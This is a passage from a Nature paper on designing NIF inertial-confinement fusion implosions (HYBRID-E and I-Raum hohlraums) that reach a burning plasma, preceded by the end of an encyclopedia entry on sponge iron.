advantage of the bloomery technique is that iron can be obtained at a lower furnace temperature, only about 1,100°C or so. The disadvantage, relatively to using a blast furnace, is that only small quantities can be made at a time. Uses[edit] Sponge iron is not useful by itself, but can be processed to create wrought iron. The sponge is removed from the furnace, called a bloomery, and repeatedly beaten with heavy hammers and folded over to remove the slag, oxidise any carbon or carbide and weld the iron together. This treatment usually creates wrought iron with about three percent slag and a fraction of a percent of other impurities. Further treatment may add controlled amounts of carbon, allowing various kinds of heat treatment (e.g. "steeling"). Today, sponge iron is created by reducing iron ore without melting it. This makes for an energy-efficient feedstock for specialty steel manufacturers which used to rely upon scrap metal. See also[edit] Article On DRI References[edit] Notes 1. ^ "What is direct reduced iron (DRI)? definition and meaning". Businessdictionary.com. Retrieved 2011-07-11.  2. ^ R. J. Fruehan, et al. (2000). Theoretical Minimum Energies to Produce Steel (for Selected Conditions) 3. ^ Hattwig, Martin; Steen, Henrikus (2004), Handbook of explosion prevention and protection, Wiley-VCH, pp. 269–270, ISBN 978-3-527-30718-0.  Bibliography External links[edit]
__label__pos
0.915517
Skip to main content Thank you for visiting nature.com. You are using a browser version with limited support for CSS. To obtain the best experience, we recommend you use a more up to date browser (or turn off compatibility mode in Internet Explorer). In the meantime, to ensure continued support, we are displaying the site without styles and JavaScript. Design of inertial fusion implosions reaching the burning plasma regime Abstract In a burning plasma state1,2,3,4,5,6,7, alpha particles from deuterium–tritium fusion reactions redeposit their energy and are the dominant source of heating. This state has recently been achieved at the US National Ignition Facility8 using indirect-drive inertial-confinement fusion. Our experiments use a laser-generated radiation-filled cavity (a hohlraum) to spherically implode capsules containing deuterium and tritium fuel in a central hot spot where the fusion reactions occur. We have developed more efficient hohlraums to implode larger fusion targets compared with previous experiments9,10. This delivered more energy to the hot spot, whereas other parameters were optimized to maintain the high pressures required for inertial-confinement fusion. We also report improvements in implosion symmetry control by moving energy between the laser beams11,12,13,14,15,16 and designing advanced hohlraum geometry17 that allows for these larger implosions to be driven at the present laser energy and power capability of the National Ignition Facility. These design changes resulted in fusion powers of 1.5 petawatts, greater than the input power of the laser, and 170 kJ of fusion energy18,19. Radiation hydrodynamics simulations20,21 show energy deposition by alpha particles as the dominant term in the hot-spot energy balance, indicative of a burning plasma state. Main Inertially confined fusion plasmas at the US National Ignition Facility (NIF) use a rocket-like ablation effect to compress millimetre-sized capsules filled with deuterium–tritium (DT) fuel to hundreds of billions of times the pressure of Earth’s atmosphere, the conditions required for fusion and subsequent alpha heating. The rocket is created when the outer layers of the capsules containing nuclear fuel are ablated by an intense X-ray radiation bath that is generated when the 192 laser beams of the NIF illuminate the inside of a gold-lined depleted uranium X-ray conversion cavity called a ‘hohlraum’. The remaining capsule mass and fuel are accelerated towards the centre of the DT gas core at extreme implosion velocities (vimp) of nearly 400 km s–1. During stagnation, the kinetic energy of the imploding shell and DT fuel is converted into internal energy in a dense fuel layer surrounding a central lower density ‘hot spot’ where most of the fusion reactions occur. Symmetric compression of the DT fuel surrounding the hot spot is essential for providing inertial confinement and time for the alpha particles to redeposit their energy before the system explodes and rapidly cools as it expands, as well as achieving adequate areal densities required for sufficient alpha deposition. This redeposition of alpha-particle energy back into the hot spot leads to further fusion reactions and amplified neutron yield. The DT fuel is more compressible when its entropy is lower, described by the fuel adiabat (α = plasma pressure/Fermi pressure). A low adiabat is accomplished by raising the ablation pressure (Pabl) in steps before accelerating the shell inwards, with each step adding a limited amount of entropy through the shock compression of previously shocked fuel. After the maximum ablation pressure is achieved, it is important to maintain the ablation pressure as late into the implosion as possible to minimize fuel decompression before the formation of the hot spot. The total number of neutrons produced from the fusion reactions, or neutron yield (Y), of an inertially confined fusion plasma can be related to a few key implosion properties: $$Y={P}_{{{{\rm{abl}}}}}^{16/25}\left(\frac{{v}_{{{{\rm{imp}}}}}^{67/15}}{{\alpha }^{36/25}}\right){S}^{14/3}{\left(1-{{{\rm{RKE}}}}\right)}^{23/7}\eta \ ,$$ (1) where implosions of a larger scale (S) can result in a greater number of fusion reactions if the other aspects of the implosion can be maintained, which is called the ‘HYBRID’ strategy1. Measurable perturbations such as non-sphericity in the imploding shell and fuel can reduce the efficiency of the implosion to do mechanical work on the hot spot, as described in equation (1) by the residual (or left-over) kinetic energy (RKE)22. Shorter-wavelength hydrodynamic instabilities lead to the mixing of capsule material into the DT hot spot, resulting in radiative loss or reduced compression and lower yield. This is captured in the implosion efficiency term η (ref. 23; Extended Data Table 1). The degree to which hydrodynamic instabilities can impact the implosion depends on the target design as well as features in the target that can seed instabilities such as defects in the capsule generated during fabrication, the fill tube used to introduce DT24 and a support structure that holds the capsule in the centre of the hohlraum25. The exponents in equation (1) were derived for an implosion where bremsstrahlung radiation losses balance the alpha-particle heating; although they are expected to change as the plasma starts to become dominated by alpha heating, this equation shows the relative importance of these critical parameters and can be used to guide the design space. In this work, we tripled the energy from fusion reactions compared with previous experiments by increasing the scale (S) of implosion by 10–15% along with maintaining the hot-spot pressure required for inertial-confinement fusion and other critical implosion properties described in equation (1), a strategy outlined elsewhere1. Driving larger implosions to similar velocities as smaller-scale implosions9,10 and using the same amount of laser energy requires the development of more efficient smaller hohlraums with lower radiation losses from the reduced surface area. This results in a smaller case-to-capsule ratio (CCR) or smaller hohlraum diameter for a given capsule size. Such designs are more challenging for controlling implosion symmetry, as there is less room for the laser beams to propagate beyond the expanding capsule material and wall plasma, resulting in a radiation drive deficit deep in the interior of the hohlraum. As illustrated in Fig. 1a, the more intense ‘outer’ laser beams reach the wall closer to the ends of the hohlraum, creating an expanding ‘bubble’26,27 of gold plasma that intercepts the ‘inner’ beams aimed deeper towards the hohlraum waist. The resulting spatial non-uniformity in radiation temperature drives an aspherical implosion that will reduce the implosion efficiency. Larger capsules also use thicker ablators to protect against the longer times over which hydrodynamic instabilities can grow. To achieve the same shock-merger locations with thicker shells, the laser power steps needed to be more separated in time, leading to a longer-duration laser pulse and more hohlraum plasma filling. Fig. 1: Hohlraum design for larger-scale capsules. figure 1 Implosion symmetry control in low-gas-fill hohlraums is accomplished via CBET12,14,15,16 from the outer laser beams (44° and 50°) to the inner beams (23° and 30°) to compensate for reduced inner-beam propagation later in time. The amount of transfer is controlled by detuning the wavelengths of the inner and outer cones relative to each other (Δλ). a, HYBRID-E cylindrical hohlraum (left) uses more CBET than the I-Raum-shaped hohlraum (right) to achieve similar X-ray flux symmetry on the capsule in part due to the larger capsule and longer pulse length. Compared with a cylinder with the same laser pulse and beam pointing, the I-Raum ‘pockets’ radially displace the expanding wall plasma caused by the outer beams, delaying interception of the inner beams. The top half of each hohlraum shows the calculated positions of the wall and capsule materials at peak power (6 ns) from radiation hydrodynamic HYDRA simulations with individual laser rays overlaid. The gold-lined depleted uranium hohlraum is orange, the HDC ablator is grey, the DT ice layer is red and the DT fill gas is light blue. The laser rays are coloured based on their power, with some rays gaining power through CBET (more red) before becoming absorbed (more blue). The left sides depict simulations without wavelength detuning, whereas the right sides include Δλ, illustrating enhanced inner-beam propagation due to CBET from a representative 44° beam to a 23° beam. Laser absorption in the gold bubble and low-density ablated HDC is visible as the ray powers transition through white from red to blue. The rays terminate (dark blue) near where the plasma density is high enough for substantial laser absorption. The bottom half of each hohlraum depicts nominal beam pointing and relative target dimensions between the two designs as visualized by VISRAD38. Further details regarding target dimensions and design parameters are given in Extended Data Fig. 5 and Extended Data Table 2, respectively. b, Energy-flow diagrams illustrating the CBET process in more detail. The four cones of beams pass energy amongst themselves due to CBET from wavelength detuning (Δλ = inner-beam (10,530.05 Å) wavelength – outer-beam (10,528.5 Å) wavelength at the fundamental neodymium glass laser frequency, 1ω) and local plasma flows, resulting in a net gain for the inner beams and a net loss for the outer beams. c, Measured hohlraum radiation temperatures using filtered X-ray diodes (top) and the delivered laser pulses (bottom) for one high-performing shot from each design. Implosion symmetry was previously controlled in small-CCR hohlraums28,29 by transferring energy between laser beams, or cross-beam energy transfer (CBET). In this process, light is scattered from one crossing laser beam to the other through an ion acoustic wave that is resonantly driven by the overlapping laser beams when they have different wavelengths or in the presence of plasma flow. However, high levels of laser–plasma-interaction instabilities reduced the hohlraum efficiency by scattering laser light back out of the hohlraum. This was largely due to the application of large amounts of energy transfer in hohlraums with higher levels of helium gas fill, designed to mitigate the expanding wall by generating a counter-pressure. These configurations also resulted in large amounts of inferred high-energy electrons30 that can prematurely heat the DT fuel and raise the adiabat. It was also difficult to predict and control the radiation symmetry over the entire implosion, resulting in aspherical implosions with degraded performance28,29,31. Since then, hohlraums with lower gas-fill densities of 0.03–0.60 mg cm–3 and larger CCRs were developed to reduce laser back-scatter and high-energy electron production9,10,32,33,34. These designs varied the relative laser powers and energies to control the symmetry with no intentional energy transfer between the laser beams. This limits the total laser energy and ultimately the maximum scale that can currently be fielded, since a fraction of the beams will be at less than the maximum capability. Here we introduce two designs that enable increasing the capsule scale within the limits of the NIF laser and providing symmetry control in more efficient, smaller-CCR hohlraums: transferring energy between the laser beams by changing their relative wavelengths in hohlraums with low helium gas fill (HYBRID-E)11,13 and using a shaped (non-cylindrical) hohlraum to delay plasma filling for better inner-beam propagation (I-Raum)17. The first technique, as illustrated in Fig. 1, transfers energy from the ‘outer’ beams to the ‘inner’ beams, increasing the power delivered to the waist of the hohlraum, in a low-back-scatter environment. Even in the presence of large amounts of transfer (up to two times increase in the inner-beam power), the measured laser energy coupled to the hohlraum is ≥98% (ref. 11) and the inferred level of hot electrons is more than an order of magnitude lower than previously seen in high-gas-fill hohlraums using wavelength detuning. Reduced back-scatter and laser–plasma-interaction instabilities in the presence of large amounts of transfer creates a stronger observed sensitivity of implosion symmetry to wavelength detuning, allowing for radiation-symmetry control throughout the drive history11,22. The HYBRID-E design demonstrates the use of wavelength detuning in a hohlraum with a gas-fill density of 0.3 mg cm–3. The I-Raum17 concept adds engineered pockets in the wall to displace the plasma blowoff generated by the outer beams radially outwards, delaying expansion into the inner beams compared with a cylinder having the same pointing and pulse shape; further, wavelength detuning was used to control symmetry. Both platforms used data-driven models26 to guide the hohlraum design choices that impact the extent of ‘bubble’ and implosion symmetry (Methods). The top half of Fig. 1a shows the hydrodynamic simulations of HYDRA20,21 radiation of the two designs midway through peak power at 6 ns after the start of the laser pulse (Methods provides a description of the simulation methodology). The colour contour shows the material boundary: gold shows the expanding hohlraum wall plasma; grey, the expanding capsule ablator; red, the inwards-moving cryogenic DT fuel layer; and light blue, the DT gas. The so-called ‘gold bubble’26,27 launched by the outer (44° and 50°) beams can be seen intercepting the inner beams (23° and 44°) and interacting with the capsule blowoff. Simulated laser rays, coloured by the spatially varying power as energy is exchanged or absorbed, illustrate the impact of CBET with wavelength detuning (for example, for HYBRID-E Δλ = inner-beam (10,530.05 Å) wavelength – outer-beam (10,528.5 Å) wavelength at the fundamental neodymium glass laser frequency (1ω), before conversion to the third harmonic at 351 nm.) by comparing simulations with no detuning (left) to simulations that include detuning (right). With CBET, a substantial amount of power is transferred from the outer to inner beams, enhancing the drive at the hohlraum waist. The white band of inner-beam absorption in the simulations without CBET traces the position of the expanding gold bubble and also indicates laser absorption in the capsule ablator. Figure 1b also shows the total calculated energy transfer between the laser cones for the two designs. Lower energy transfer between the beams was required in the I-Raum design due to the outwards bubble displacement by the pockets, the smaller-scale capsule and the shorter laser pulse length as a result of the thinner DT ice layer (with a shorter shock-transit time). Despite the I-Raum pockets, the position of the bubble is similar for the two designs in this work as a result of other design differences governing the bubble growth26,27. The measured radiation temperatures (Tr; Fig. 1c) are similar, as expected for hohlraums with nearly the same surface area. The laser power histories for each design with different ‘epochs’ labelled are also shown in Fig. 1c. Figure 2 shows that the designs presented in this work (red and blue points) realized the benefit of higher capsule-absorbed energy (to increase the energy delivered to the hot spot) compared with previous high-density carbon (HDC) campaigns or Bigfoot implosions (grey points) by operating at a larger scale, but only when improving or maintaining the other metrics in equation (1). The expected extrapolation in performance to higher levels of capsule-absorbed energy from a smaller-scale HDC campaign implosion N170601 (ref. 35) are also shown, which were calculated using radiation hydrodynamic simulations in two and three dimensions. Here the symmetry (Extended Data Fig. 1), stability (Extended Data Fig. 2), implosion velocity, adiabat and inflight ablation pressure were maintained in the scaling. Fig. 2: Proximity to expectations and optimization. figure 2 Neutron yield as a function of capsule-absorbed energy for the I-Raum (blue, closed symbols; N210220 and N201122) and HYBRID-E (red, closed symbols; N210207, N210307 and N201101) experiments in this work together with previous HDC campaign experiments9 (grey points), and two- and three-dimensional simulations of scaling the capsule-absorbed energy from N170601 (ref. 35) (solid black lines). The capsule-absorbed energy quoted for each experiment is derived from simulations, and the error bars represent the maximum range over which the simulated bang time remains consistent with the measurements when fine-tuning the X-ray drive to calibrate the experiments. The experiments in this work follow the predictions when the other important implosion properties in the yield equation (equation (1)) are also maintained, such as velocity, adiabat, ‘coast time’, stability and symmetry. Then, the capsule-absorbed energy can be efficiently converted into hot-spot internal energy and pressure. Additional experiments in the I-Raum and HYBRID-E campaigns led to the optimization in this work (open symbols; N190217, N191105, N201011, N200229 and N191110) but were compromised by known degradations to the terms in equation (1), as discussed in the main text. The present experiments are not directly scaled hydrodynamically from N170601, however, and improve on certain aspects of the implosion, for example, low-mode asymmetries. Therefore, the present experiments are not expected to necessarily follow these trend lines, but they provide a guideline for potential improvement when scaling up the implosion size at a similar adiabat and implosion velocity. The larger-scale I-Raum (blue) and HYBRID-E (red) designs absorb more energy but use larger hohlraums (lower Tr) compared with N170601 to maintain symmetry and require thicker ablators or DT layers to maintain stability (Methods), which results in similar implosion velocities (Table 1). Due to the mergers of the first and second shocks occurring inside the DT ice at ~10 μm larger radius than the ice–gas interface, the fuel adiabats at peak velocity were a little higher for both designs (3.0−3.2) compared with N170601 (2.5) (Table 1), and the ‘coast times’ were longer. However, the low-mode asymmetry, namely, mode 2 of the Legendre decomposition of the hot spot in N170601 that was kept constant in the extrapolation to be more conservative, was improved in the highest-performing I-Raum and HYBRID-E experiments (Methods provides more details). Table 1 Integrated implosion metrics The progression of design or experimental optimization within the HYBRID-E and I-Raum campaigns is shown through several example points (open and closed symbols), which illustrates that the benefit of increased capsule energy can only be realized if the pressure is maintained through the other terms in equation (1). Both designs have worked to maintain the late-time ablation pressure but continued optimization is ongoing. A metric for this is the ‘coast time’36 or the time that the implosion has to decompress when the radiation drive is decreasing (Table 1 and Methods), which was reduced between experiments N201011 and N201101 by extending the laser pulse and resulted in more than thrice the neutron yield. Experiment N200229 had more coupled energy to the capsule than the experiments in this paper using a larger-scale capsule (inner radius, 1,100 μm), but the ‘coast time’ was ~1.7 times longer, the symmetry was substantially worse (very oblate) and there were many more seeds for high-mode perturbations present in the ablator19. The other non-optimized I-Raum and HYBRID-E experiments in Fig. 2 (open symbols) are impacted by reduced implosion efficiency due to hydrodynamic instabilities or low-mode asymmetries compared with the highest performers (closed symbols) (Methods provides additional details). By increasing the hot-spot energy, with more coupled energy to the implosion and also maintaining the hot-spot pressure, we have created a burning plasma state in the laboratory. The criteria for achieving a burning plasma state are investigated using analytical models18 and key quantities derived from high-resolution two-dimensional HYDRA simulations that reproduce the performance metrics (Methods and Table 1). The mechanical PdV work (EPdV) on the hot spot and total DT fuel from the imploding DT ice and ablator material are directly extracted from the simulations (Methods). The net cumulative hot-spot energies as a function of time relative to the time of peak neutron production (‘bang time’) are shown in Fig. 3, where the corresponding insets show the simulated densities and temperatures at bang time. A comparison of simulations and measurements of the compressed DT shell is provided in Methods. Simulations where alpha-particle heating is artificially turned off (no-α) are also shown and enable more accurate tracking of the mechanical work. Fig. 3: Hot-spot energy partition in the burning plasma regime. figure 3 The coloured lines show the calculated cumulative hot-spot energies as a function of time for each shot. Each panel shows data from one ‘burn on’ simulation that includes alpha deposition (α-on; solid curves) and one ‘burn off’ simulation in which alpha particles leave the problem without depositing energy (no-α; dashed curves). The time axis has been scaled relative to the ‘bang time’, or time of peak neutron production, for each simulation with alpha deposition included. The respective (α-on, α-off) bang times in nanoseconds for shots N201101, N201122, N210207 and N210220 are (9.35, 9.30), (9.08, 9.03), (8.67, 8.60) and (8.80, 8.70), respectively. The total hot-spot internal energy (black) is increased due to hydrodynamic compression (PdV work; blue) up until stagnation and any alpha heating (green), and is reduced due to bremsstrahlung radiation losses (red) and hydrodynamic expansion after stagnation (PdV work; blue). For these experiments, after entering the burning plasma regime, alpha-particle heating outstrips the radiation losses, becoming the dominant term in the hot-spot energy balance. The insets illustrate the simulated configuration of the hot spot and dense surrounding shell with density (g cm–3) on the left half and ion temperature (keV) on the right half. The hot spot is defined as a fixed collection of DT mass, tracked over time, that gives 98% of the neutron production at peak burn. The maximum (density (g ml–1), ion temperature (keV)) values for shots N201101, N201122, N210207 and N210220 are (350, 7.31), (450, 6.49), (350, 8.40) and (450, 7.20), respectively. We now demonstrate that these four experiments enter the burning plasma regime based on several different metrics. We find that the net energy from alpha-particle heating at bang time (\({E}_{\upalpha }^{{\mathrm{a}}} ,{{\mathrm{b}} }\)) is greater than the energy from work done on the hot spot (EPdV) at bang time for three out of the four experiments and is thus the dominant source in the energy balance equation (EIE = Eα + EPdV − Erad − Econd). (See Table 1 for an explanation of the nomenclature; superscript ‘a’ indicates the quantity taken at peak neutron production, or ‘bang time’, and superscript ‘b’ indicates the quantity is extracted from the data shown in Fig. 3.) Although the simulated metric for all the four experiments is met (\({E}_{\upalpha }^{{\mathrm{a}},{\mathrm{b}}}/{E}_{P{\mathrm{d}}V,{\rm{no}}{\mbox{-}} \upalpha }\,\) > 1), the more simplistic metric of ~0.5Eα/EPdV,HS,no-α > 1 is only met by the two highest-performing experiments. The net energy from alpha-particle heating is calculated to be greater than the energy-loss terms from radiation and conduction (Erad and Econd, respectively) for all the experiments. Here the radiation losses are extracted from the simulations and conduction losses are inferred from the energy balance equation. Other metrics for burning plasma include the ratio of the total energy produced by the alpha particles to the total DT kinetic energy (Eα/KE > 1), which is met by all the four experiments. Additionally, the burning plasma criteria for yield amplification2 and increase in yield due to alpha-particle heating (Yamp ≥ 3.5) are met by all four experiments, and the fuel gain criterion (Gfuel)28, the ratio of the total fusion yield to the PdV work done on the hot spot and compressed DT ice (DT EPdV,no-α), is met by three experiments. Finally, the Hurricane model for assessing a burning plasma state using the simulated hot-spot areal density, ion temperature and implosion velocity (vcond/vimp) is met by all the four experiments. In summary, N210207 meets all the criteria and also dominates the energy balance equation including hot-spot internal energy, two experiments meet all the criteria and all the four experiments meet several of the criteria for burning plasma. Future experiments will continue to optimize these platforms by reducing the sources of high-mode perturbations (for example, capsule defects and DT fill tube), reduce the adiabat by improving the shock timing and the rate of the final rise to peak laser power, and improve the hot-spot pressure or energy coupling with even more efficient hohlraums or by varying the DT ice thickness (Methods). These improvements are calculated to have large impacts in performance, for example, reducing the ‘coast time’ with a smaller laser entrance hole (LEH) is calculated to improve the performance by almost two times. As this paper was being finalized, a new experiment in the HYBRID-E series on 8 August 2021 produced ~1.35 MJ of fusion yield and a capsule gain of ~6, a significant achievement for the field of ICF (announced by our institution in a press release37); this experiment will be described in a future publication. In addition, we continue to study the tradeoffs between the ablator and DT thickness ratios for large-scale implosions, which is important for understanding limitations on design choices for future designs that additionally increase the scale beyond the designs in this paper. Methods Additional design parameters The HYBRID-E and I-Raum designs use similar hohlraum surface areas (2.5 cm2 for HYBRID-E and 2.6 cm2 for I-Raum) and length, and the same size of LEHs—the main source of radiation loss, which led to similar radiation temperatures (Fig. 1). The HYBRID-E shots N201101 and N210207 use wavelength separations of 1.75 and 1.55 Å, respectively, between the outer and inner beams to implode an HDC capsule (inner radius, 1,050 μm) filled with a 65-μm-thick frozen DT ‘ice’ layer (density ≈ 0.25 g cm–3) with sufficient drive at the hohlraum equator. The I-Raum shots N201122 and N210220 use 260 μm recessed pockets together with 0.5 Å wavelength separation to drive a diamond capsule (inner radius, 1,000 μm) filled with a 55-μm-thick frozen DT ‘ice’ layer. The outer surface areas of the ablators were 16 mm3 for HYBRID-E and 14.7 mm3 for I-Raum. Extended Data Fig. 5 provides additional hohlraum design dimensions. Both designs used an HDC ablator (capsule) with either nanocrystalline or microcrystalline structure39 and a W dopant layer to act as a preheat shield from high-energy hohlraum X-rays and provide a more stable Atwood number35,40. Both designs increase the ablator thickness compared with smaller-scale implosions9,10, which is required when hydroscaling (hydrodynamic scaling) a design to shield against the longer time for hydrodynamic instabilities to grow. The I-Raum design used an ablator that was thicker (~14% in effective thickness) than the increase in capsule scale (~10% increase in capsule radius) compared with the HDC campaign9. The ‘effective’ thickness accounts for the difference in crystalline structures between the designs (microcrystalline for HDC and Bigfoot), which changes the HDC density. Nanocrystalline ablators have lower density and require thicker layers for the same ‘effective’ layer thickness compared with microcrystalline HDC, conserving the total initial ablator mass to provide similar amounts of ablator mass remaining following ablation from the radiation drive. The HYBRID-E design increased the ablator thickness compared with the HDC campaign design but was thinner than the ratio of the increase in capsule scale (~10% thicker versus an increase in capsule scale of ~15%). However, the thickness of HYBRID-E is consistent with a separate recent prescription for hydroscaling35, which accounts for the fact that the penetration depth of the X-ray radiation drive does not hydrodynamically scale. This choice was initially made, given the current radiation drive, to enable driving a thicker DT ice layer than the hydroscaled version (~18% increase in thickness compared with a ~15% increase in capsule scale) to a similar velocity for the purpose of providing more protection against high-mode perturbations from known capsule defects present in these specific capsule batches, and has been previously shown to be effective13. However, as found elsewhere35, the scaled ablator thickness should be thinned by 5 μm for every 20% increase in scale, which is consistent with the HYBRID-E design thickness as a hydroscale of the HDC campaign9 and Bigfoot10. The I-Raum design uses the same ice thickness as the HDC design, thinner than hydrodynamically scaled with the capsule radius, which may enable higher convergence and velocities for a given ablator mass remaining given a good capsule quality. Experiments at the inner-radius scale of 1,050 μm using thinner DT ice layers (10 μm thinner) are currently being tested. Preliminary results show faster implosion velocities (+10–15 km s–1) at similar ablator mass remaining and levels of hot-spot mixing. The tradeoff in ablator and DT ice thicknesses versus directly hydroscaling the HDC campaign9,35 will be tested in future experiments using even more efficient hohlraums (Methods). These studies are imperative for understanding the design limitations of additionally increasing capsule scale within the experimental capability of the NIF. To maintain linear growth factors (relative growth of a perturbation at peak implosion velocity compared with its initial size) at both interfaces when hydroscaling, the prescription from another study35 is to reduce the dopant concentration by the reciprocal of the scale increase. For the HYBRID-E N210207, the dopant was lowered to 0.28% tungsten (W), consistent with this scaling as compared with the HDC campaign design (0.33% W and a similar layer thickness). HYBRID-E experiment N201101 used an HDC capsule with higher optical depth (dopant concentration times the dopant layer thickness) compared with the HDC campaign design (Extended Data Table 2), but performed similar to N210207 when accounting for the difference in the hot spot and dense fuel symmetry. The doped layer in the I-Raum design was thicker than that for HYBRID-E or than the scale of the HDC campaign or Bigfoot designs, which resulted in lower growth factors at the fuel–ablator interface and higher growth factors at the ablation front compared with HDC or HYBRID-E (Extended Data Fig. 2). Uncertainties in the hohlraum atomic models used in this work could lead to growth factors at the ablation front that are ~200 higher than those shown in Extended Data Fig. 2 for both designs. Another factor when designing implosion stability is the early part of the laser pulse (called the ‘picket’), which launches the first shock and impacts the steepness of the ablation-front profile. Higher early time ablation pressure can reduce perturbation growth factors at the ablation front. The HYBRID-E and I-Raum designs had similar first-shock radiation temperatures, which was achieved with a lower picket power for HYBRID-E due to the smaller CCR where the outer beams hit the hohlraum wall compared with I-Raum. This led to similar first shock strengths (>12 Mbar), which were designed to avoid the refreezing of the diamond behind the shock front and in the reflected shock, as well as similar fuel adiabats at peak velocity. A short ‘coast time’—nominally the time between the maximum radiation temperature and bang time (maximum compression)—is important for maintaining the ablation pressure and achieving high hot-spot pressures and fuel compression36, but is more challenging with a fixed laser energy and for maintaining symmetry. A ramped (or ‘drooping’) laser pulse10,41 was used in HYBRID-E, which was designed to help maintain the late-time ablation pressure at the larger scale and enabling the full use of the NIF laser (Extended Data Fig. 1). For the experiments in this paper, the coast times (defined as the time between the bang time and the time at which Tr falls to 95% of the maximum Tr) are similar but shorter for HYBRID-E due to the ramped laser power at the end of the pulse. A metric related to coast time is the deceleration time or time between the peak implosion velocity and bang time. This is approximately Rpv/vimp, where Rpv is the radius at peak velocity and vimp is the implosion velocity but can be slightly different than the calculated deceleration time due to velocity changes over the deceleration time (Table 1). The increased deceleration rate associated with a short coast increases the rate at which implosion kinetic energy is turned into internal energy. For fixed vimp, a larger-scale implosion will have a longer deceleration time; therefore, it is necessary to compensate for that by keeping the late-time hohlraum temperature hot (maintaining a higher late-time ablation pressure) by extending the duration of the laser pulse shape (Table 1), which was longer for HYBRID-E versus I-Raum accounting for the scale factor. In the limit of zero coast time, the pressure inside the implosion, which is responsible for deceleration, rapidly overwhelms the ablation pressure outside the implosion, and the impact of further extending the radiation drive is reduced. The designs in this paper have not yet seen a reduction in impact when reducing the coast time, and further improvements can be made in both platforms. DT dense-shell non-uniformities, or ρR variations, at peak compression that can arise from early time radiation flux asymmetries are minimized by controlling the ‘foot’ of the radiation drive—the time until the rise to peak power—using cone-fraction balancing. The cone fraction is defined as the ratio of the inner laser power over the total laser power. The normalized Legendre decompositions of the radiation flux moment (P2/P0) at the foot of the pulse (before the rise to peak laser power) is designed to be as close to zero as possible, but allowed to vary during the peak of the pulse to enable the full use of NIF (33% cone fraction), and may deviate from zero at early times due to as-shot laser delivery (Extended Data Fig. 1). During the peak of the laser pulse, the inner beams can easily propagate initially and the radiation flux asymmetry has a negative sign in P2/P0 (or higher drive at the waist of the hohlraum). Near the end of the peak power, the inner beams have more difficulty propagating beyond the expanding wall and ablator material, and the sign of the P2/P0 flux changes. Changing the radiation flux asymmetry during the peak of the pulse is not detrimental to the implosion as long as the flux asymmetry can be balanced to provide a symmetric final dense shell and hot spot where the symmetry of the implosion itself is not fluctuating. This is assessed in simulations and experiments through the shape of the implosion at ~200 μm compared with peak compression at ~40 μm. The P2/P0 flux asymmetry is similar in magnitude between the designs but the sign for HYBRID-E changes faster due to the longer pulse and larger capsule as well as requiring more transfer early in the pulse to compensate for the late-time P2/P0 sign change. The primary impact of increasing the CBET is to shift the P2/P0 radiation flux during the peak of the pulse to more negative values, as well as maintaining symmetry during the ‘foot’, and does not substantially change the slope of the time-dependent P2/P0 (ref. 11). Until the time when substantial plasma filling and LEH closure come into play, radiation hydrodynamic simulations tuned to previous data are very predictive in designing symmetric shocks viewed along the pole and equator, a metric for ‘foot’ P2 flux asymmetry (Methods). Even when using CBET to control symmetry during the peak of the pulse, radiation drive symmetry during the foot of the pulse can be accurately predicted and modelled with no artificial multipliers in low-gas-fill hohlraums11,12,42. The P4/P0 flux asymmetry is mainly determined by the CCR, picket power and outer-beam pointing. Changes between the designs lead to slightly worse calculated P4/P0 flux asymmetry for I-Raum compared with HYBRID-E in the ‘foot’ of the laser pulse. Continued discussion on optimization and reproducibility The progression of the design or experimental optimization within the HYBRID-E and I-Raum campaigns is shown in Fig. 2 through several example points (open and closed symbols), illustrating the benefit of increased capsule energy only when the pressure is also maintained through the other terms in equation (1). In addition to the reduction in ‘coast time’ from the inner radius of 1,100 to 1,050 μm for HYBRID-E implosions, the stability and low-mode asymmetries were also improved in the campaign optimizations for HYBRID-E and I-Raum. For example, I-Raum experiments N190217 versus N191105 also showed the impact of improving high-mode instabilities on the neutron yield by reducing the number of ablator defects and improving the design stability using a higher picket. An implosion efficiency term η (ref. 23 and Extended Data Table 1) estimates the reduction in yield due to radiative loss from the hot spot and cold fuel, which was reduced when the capsule quality was increased between these experiments. Capsule defects that can seed high-mode perturbations, other than the support tent and DT fill tube, are still present in the HYBRID-E experiments19, and further improvement could lead to higher performance19. Both designs are predicted to have increased performance with reduction in DT fill tube size, which can result in ablator mix into the hot spot19; experiments to test this are ongoing. Improving the low-mode radiation drive asymmetries, which is challenging at a larger scale, also enabled the efficient conversion of capsule-absorbed energy to hot-spot internal energy. This is shown by the increase in performance of I-Raum designs N201122 and N210220 compared with N191105, which improved the symmetry by introducing a small amount of wavelength detuning (Δλ = 0.5 Å). A metric for improvement in symmetry is the level of oblateness of the implosion, namely, mode 2 coefficient of the Legendre decomposition of the 17% intensity contour of the primary neutron image (P2) (Extended Data Table 1). The HYBRID-E experiments also improved symmetry by reducing the amount of wavelength detuning between experiments N201101 (1.75 Å) versus N210307 and N210207 (1.55 Å), improving performance by 40–70%. Both designs control the time-dependent radiation flux symmetry during the early part of the laser pulse using the fine-tuning of the laser power balance. Although the intrinsic low-mode asymmetries were improved to reach high performance, as-shot laser power variations and target non-uniformities resulted in odd-mode asymmetries that are calculated to impact the performance, and are worse for I-Raum experiments19. Additional tests to reduce these non-uniformities are ongoing. HYBRID-E experiment N210307 was similar to N210207 with regard to the hohlraum configuration, capsule size, ice thickness, shock timing, wavelength separation and velocity, but used different HDC capsules having a larger number of known degradations in the ablator that can seed hydrodynamic instabilities. There were also some differences in the calculated hydrodynamic stability due to differences in the as-delivered percentage of the W dopant level and crystal structure of the ablator. However, these experiments performed similarly, even with differences in the capsule quality and differences in the low-mode asymmetry (primary neutron image P2), which provides confidence in the reproducibility of the burning plasma results for near-neighbour designs. In I-Raum experiment N210220, compared with N201122, an intentional laser imbalance was attempted to mitigate the known sources of Legendre mode 1 asymmetry in the implosion, seeded by hohlraum diagnostic windows and ablator thickness non-uniformity. Detailed analyses and understanding of these experiments are ongoing. Simulation methodology Optimizations to the target designs were studied through numerical simulations (HYDRA21) and using semi-empirical models26 to guide design choices relating to the radiation drive symmetry during the peak of the laser pulse, which is difficult to model. Once adjusted using power multipliers, numerical simulations are generally predictive in calculating the implosion energetics for finite changes in the design space, for example, laser pulse power history or capsule parameter changes in the same hohlraum configuration. These simulations can be extrapolated further in the design space for exploring new hohlraum configurations, but have more uncertainty and may need to be recalibrated. The numerical simulations can also very accurately predict the radiation drive symmetry during the ‘foot’ of the pulse11,12, until the rise to peak laser power, in the presence of large amounts of CBET specifically enabled by using low-gas-fill hohlraums. However, the simulation cannot accurately and consistently model the radiation flux symmetry during the main part of the laser pulse (peak power). Controlling the symmetry during this part of the pulse is critical for achieving adequate implosion symmetry. As part of the 